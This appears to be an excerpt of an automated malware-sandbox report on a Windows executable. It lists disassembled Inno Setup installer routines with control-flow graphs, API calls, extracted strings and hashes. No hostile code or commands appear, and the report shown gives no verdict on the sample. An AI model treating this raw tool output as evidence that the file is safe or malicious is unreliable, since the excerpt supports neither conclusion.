                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$Close
                                                                                            • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                            • API String ID: 3391052094-3342197833
                                                                                            • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                            • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                            • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                            • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1080 4928c9 1062->1080 1078 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1078 1079 492960-49296d call 403684 1070->1079 1071->1060 1078->1060 1090 4929bc-4929c9 call 403684 1079->1090 1091 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1079->1091 1080->1060 1100 492a18-492a25 call 403684 1090->1100 1101 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1090->1101 1091->1060 1113 492a52-492a5f call 403684 1100->1113 1114 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1100->1114 1101->1060 1125 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1113->1125 1126 492aa0-492aad call 403684 1113->1126 1114->1060 1125->1060 1138 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1126->1138 1139 492af4-492b01 call 403684 1126->1139 1138->1060 1152 492b48-492b55 call 403684 1139->1152 1153 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1139->1153 1164 492baa-492bb7 call 403684 1152->1164 1165 492b57-492b75 call 446ff8 call 42e394 1152->1165 1153->1060 1175 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1164->1175 1176 492c31-492c3e call 403684 1164->1176 1185 492b87-492b95 GetLastError call 447278 1165->1185 1186 492b77-492b85 call 447278 1165->1186 1206 492c21-492c2c call 4470d0 1175->1206 1207 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1175->1207 1187 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1176->1187 1188 492c66-492c73 call 403684 1176->1188 1194 492b9a-492ba5 call 447278 1185->1194 1186->1194 1187->1060 1203 492c98-492ca5 call 403684 1188->1203 1204 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1188->1204 1194->1060 1215 492cdb-492ce8 call 403684 1203->1215 1216 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1203->1216 1204->1060 1206->1060 1207->1060 1228 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1215->1228 1229 492d1e 1215->1229 1216->1060 1228->1060 1229->1060
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindSleepWindow
                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                            • API String ID: 3078808852-3310373309
                                                                                            • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                            • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                            • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                            • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1632 483ac8-483acc 1625->1632 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1633 483b29-483b46 1628->1633 1634 483b3d-483b44 1628->1634 1629->1630 1632->1624 1635 483ace-483ad5 call 45271c 1632->1635 1633->1630 1634->1630 1635->1624 1639 483ad7-483ae4 GetProcAddress 1635->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                            • API String ID: 2230631259-2623177817
                                                                                            • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                            • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                            • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                            • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1686 468e84 1668->1686 1670 468e94-468eb9 call 42dd4c * 2 1669->1670 1671 468eeb-468ef2 1669->1671 1693 468ebb-468ec4 call 4314f8 1670->1693 1694 468ec9-468edb call 42dd4c 1670->1694 1673 468ef4-468f06 call 42dd4c 1671->1673 1674 468f38-468f3f 1671->1674 1687 468f16-468f28 call 42dd4c 1673->1687 1688 468f08-468f11 call 4314f8 1673->1688 1680 468f41-468f75 call 42dd4c * 3 1674->1680 1681 468f7a-468f90 RegCloseKey 1674->1681 1680->1681 1686->1669 1687->1674 1701 468f2a-468f33 call 4314f8 1687->1701 1688->1687 1693->1694 1694->1671 1704 468edd-468ee6 call 4314f8 1694->1704 1701->1674 1704->1671
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                            • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                            • Inno Setup: No Icons, xrefs: 00468E73
                                                                                            • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                            • Inno Setup: App Path, xrefs: 00468E4A
                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                            • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                            • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                            • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                            • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                            • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                            • %s\%s_is1, xrefs: 00468E05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1093091907
                                                                                            • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                            • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                            • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                            • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                              • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                            • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                            • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                              • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                            • API String ID: 3771764029-544719455
                                                                                            • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                            • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                            • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                            • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                            APIs
                                                                                              • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                            • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                            • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                            • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                            • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                            • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                            • String ID: |6B
                                                                                            • API String ID: 183575631-3009739247
                                                                                            • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                            • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                            • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                            • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1997 47cefb-47cf01 1994->1997 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1997->1991 1997->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(739B0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                            • API String ID: 190572456-256906917
                                                                                            • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                            • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                            • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                            • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                            • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                            • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                            • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID: 3A$yA
                                                                                            • API String ID: 3887896539-3278460822
                                                                                            • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                            • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                            • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                            • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2928 46730a-467311 2919->2928 2928->2920 2931 467313-467338 ExtractIconA call 4670c0 2928->2931 2931->2920 2932->2920
                                                                                            APIs
                                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
